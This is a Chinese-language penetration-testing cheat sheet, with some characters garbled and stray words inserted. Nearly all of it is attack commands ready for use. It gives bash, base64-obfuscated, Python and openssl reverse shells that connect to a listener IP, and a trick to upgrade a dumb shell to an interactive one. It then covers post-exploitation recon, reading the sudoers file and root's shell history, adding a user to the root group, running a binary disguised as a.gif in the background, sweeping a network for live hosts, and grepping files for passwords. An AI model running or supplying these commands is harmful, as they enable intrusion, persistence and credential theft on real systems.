bash 反彈
- 本機(jī)監(jiān)聽8080端口
nc -lv 8080
- 目標(biāo)機(jī)bash反彈8080端口
bash -i >& /dev/tcp/192.168.25.144/8080 0>&1
base64編碼后反彈
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC43NS45LjE4NS84MDkwIDA+JjE=}|{base64,-d}|{bash,-i}
python反彈
本地監(jiān)聽8080端口
nc -lv 8080
目標(biāo)機(jī)python反彈8080端口
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.186.25.144",8080));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/bash","-i"]);'
在某些特殊環(huán)境下,無(wú)法利用bash反彈,python是你的不二選擇菠剩。
openssl加密反彈
- 生成SSL證書的公鑰/私鑰對(duì)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
- 監(jiān)聽8080端口
openssl s_server -quiet -key key.pem -cert cert.pem -port 8080
- 目標(biāo)機(jī)器上openssl反彈
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.80.137:8080 > /tmp/s; rm /tmp/s
啞shell變交互式shell
啞shell 執(zhí)行
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z暫停服務(wù)蛛倦,回到vps命令行
vps中執(zhí)行
stty raw -echo
fg
回到啞shell
reset
即可獲取交互式shell桶至。
不出網(wǎng)的命令執(zhí)行
不出網(wǎng)情況下,查找web固定文件匾旭,將結(jié)果輸出到web路徑下
find / -name upload.js|while read f;do sh -c 'id;pwd;ifconfig' >$(dirname $f)/test.txt;done
信息收集
查看本地開放TCP镣屹、UDP端口
netstat -tulp
-t TCP
-p 進(jìn)程
-l 顯示服務(wù)器
-u UDP
-n 使用ip地址,而不是域名
查看進(jìn)程
ps -aux
查看登錄記錄
last
所有用戶上次登錄的信息
lastlog
允許以root用戶運(yùn)行
cat /etc/sudoers
查看root用戶歷史命令
cat /root/.bash_history
添加用戶到root
useradd test 添加用戶
passwd 123456 更改密碼
usermod -g root test 更改用戶組
查看計(jì)劃任務(wù)
crontab -l
查看iptables
iptables -L
查看路由
route
查看系統(tǒng)版本
cat /etc/issue
列出系統(tǒng)所有用戶
cat /etc/passwd
查找文件
whereis java
賦予權(quán)限
chmod 775 a.gif
后臺(tái)運(yùn)行該文件
nohup ./a.gif &
結(jié)束所以a.gif進(jìn)程
kill -9 `ps -aux | grep 'a.gif' | awk '{print $2}'`
python2開啟http服務(wù)
python -m SimpleHTTPServer 8080
后滲透
判斷存活主機(jī)
#!/bin/bash
for i in {1..254}
do
ping -c 3 -i 0.2 -W 1 192.168.$i.1 &> /dev/null
if [ $? -eq 0 ] ; then
echo "Host 192.168.$i.1 is up" >> active_result.txt
else
echo "Host 192.168.$i.1 is down"
fi
done
收集password信息
find -type f -name '*.properfies' | xargs grep 'password'
篩選last登錄ip
last | awk '{print $3}'
待補(bǔ)充
